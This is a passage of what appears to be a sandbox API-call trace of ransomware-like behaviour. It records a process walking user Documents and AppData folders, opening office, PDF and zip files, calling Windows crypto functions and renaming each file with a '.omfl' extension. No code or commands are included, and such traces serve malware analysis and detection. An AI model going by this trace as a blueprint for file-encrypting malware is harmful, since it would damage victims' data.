ylO\\xj3kFMwlyq\\hWeeWikMxag79wT.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\hweewikmxag79wt.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.816] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=50268) returned 1 [0134.816] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.818] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2f78) returned 1 [0134.819] CryptCreateHash (in: hProv=0x49d2f78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.819] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.819] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.819] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.819] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.820] GetLastError () returned 0x0 [0134.820] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.820] CryptReleaseContext (hProv=0x49d2f78, dwFlags=0x0) returned 1 [0134.820] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.820] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.820] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.820] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.821] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\hWeeWikMxag79wT.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\hweewikmxag79wt.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\hWeeWikMxag79wT.pptx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\hweewikmxag79wt.pptx.omfl")) returned 1 [0134.822] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\OO_fgksi0FYEuwxn.odt") returned=".odt" [0134.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\OO_fgksi0FYEuwxn.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\oo_fgksi0fyeuwxn.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.822] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=58193) returned 1 [0134.822] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.825] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2f78) returned 1 [0134.826] CryptCreateHash (in: hProv=0x49d2f78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.826] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.826] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.826] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.826] GetLastError () returned 0x0 [0134.826] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.826] CryptReleaseContext (hProv=0x49d2f78, dwFlags=0x0) returned 1 [0134.826] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.826] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.826] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.827] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\OO_fgksi0FYEuwxn.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\oo_fgksi0fyeuwxn.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\OO_fgksi0FYEuwxn.odt.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\oo_fgksi0fyeuwxn.odt.omfl")) returned 1 [0134.828] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\y0ay2zR12nj9iR.doc") returned=".doc" [0134.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\y0ay2zR12nj9iR.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\y0ay2zr12nj9ir.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.829] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=36785) returned 1 [0134.829] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.831] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2f78) returned 1 [0134.832] CryptCreateHash (in: hProv=0x49d2f78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.832] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.832] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.832] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.832] GetLastError () returned 0x0 [0134.832] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.832] CryptReleaseContext (hProv=0x49d2f78, dwFlags=0x0) returned 1 [0134.832] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.832] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.832] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.833] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\y0ay2zR12nj9iR.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\y0ay2zr12nj9ir.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\y0ay2zR12nj9iR.doc.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\y0ay2zr12nj9ir.doc.omfl")) returned 1 [0134.834] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\zJJF3q9qkQPzhC 5.pdf") returned=".pdf" [0134.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\zJJF3q9qkQPzhC 5.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\zjjf3q9qkqpzhc 5.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.835] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=78194) returned 1 [0134.835] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.838] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2f78) returned 1 [0134.838] CryptCreateHash (in: hProv=0x49d2f78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.838] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.838] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.838] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.838] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.839] GetLastError () returned 0x0 [0134.839] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.839] CryptReleaseContext (hProv=0x49d2f78, dwFlags=0x0) returned 1 [0134.839] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.839] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.839] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.840] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\zJJF3q9qkQPzhC 5.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\zjjf3q9qkqpzhc 5.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\GG7LokQ3R5cq6 ylO\\xj3kFMwlyq\\zJJF3q9qkQPzhC 5.pdf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\gg7lokq3r5cq6 ylo\\xj3kfmwlyq\\zjjf3q9qkqpzhc 5.pdf.omfl")) returned 1 [0134.842] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.842] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.842] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd147c0 [0134.842] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.842] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0134.842] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3220 [0134.842] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0134.842] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.842] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0134.842] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0134.842] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.842] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.842] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.842] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.843] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b840 [0134.843] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.843] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.843] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.843] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.843] PathFindFileNameW (pszPath="") returned="" [0134.843] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd147c0 [0134.843] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.874] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned=".zip" [0134.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.875] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=42495) returned 1 [0134.875] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.880] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3220) returned 1 [0134.881] CryptCreateHash (in: hProv=0x49d3220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.881] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.881] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.881] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.881] GetLastError () returned 0x0 [0134.881] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.881] CryptReleaseContext (hProv=0x49d3220, dwFlags=0x0) returned 1 [0134.881] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.881] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.882] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.882] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.omfl")) returned 1 [0134.884] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned="" [0134.884] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0cc8 [0134.884] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0d70 [0134.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.884] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0134.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0134.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd145f8 [0134.884] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0134.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0134.884] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0134.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.885] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.885] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.885] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.885] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b888 [0134.885] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.885] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.885] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.885] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.885] PathFindFileNameW (pszPath="") returned="" [0134.885] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0d70 [0134.885] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.905] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f8358 [0134.906] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f84c8 [0134.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.906] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\") returned="Content\\" [0134.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0cc8 [0134.906] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0134.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.906] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0134.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.906] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.906] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b888 [0134.906] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.906] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.906] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.907] PathFindFileNameW (pszPath="") returned="" [0134.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f84c8 [0134.907] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.907] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0134.907] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0134.907] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0134.907] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0134.907] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0134.907] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS 